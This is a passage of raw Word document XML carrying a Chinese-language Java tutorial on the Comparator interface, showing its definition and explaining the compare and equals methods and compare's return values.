      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们若需要控制某个类的次序，而该类本身不支持排序</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即没有实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口</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；那么，我们可以建立一个</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该类的比较器</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来进行排序。这个</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比较器</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只需要实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口即可。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也就是说，我们可以通过</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实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类来新建一个比较器</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，然后通过该比较器对类进行排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparator </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparator </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口仅仅只包括两个个函数，它的定义如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>package java.util;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>public interface Comparator&lt;T&gt; {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    int compare(T o1, T o2);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    boolean equals(Object obj);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(01) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>若一个类要实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口：它一定要实现</w:t>
      </w:r>
      <w:r w:rsidR="00E948F0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>compare</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(T o1, T o2) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数，但可以不实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals(Object obj) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为什么可以不实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals(Object obj) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>因为任何类，默认都是已经实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals(Object obj)</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的一切类都是继承于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java.lang.Object</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Object.java</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals(Object obj)</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数；所以，其它所有的类也相当</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>于都实现了该函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(02) int compare(T o1, T o2) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</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比较</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>o1</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>o2</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的大小</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。返回</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负数</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，意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“o1</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>比</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>o2</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>小</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；返回</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零</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，意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“o1</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
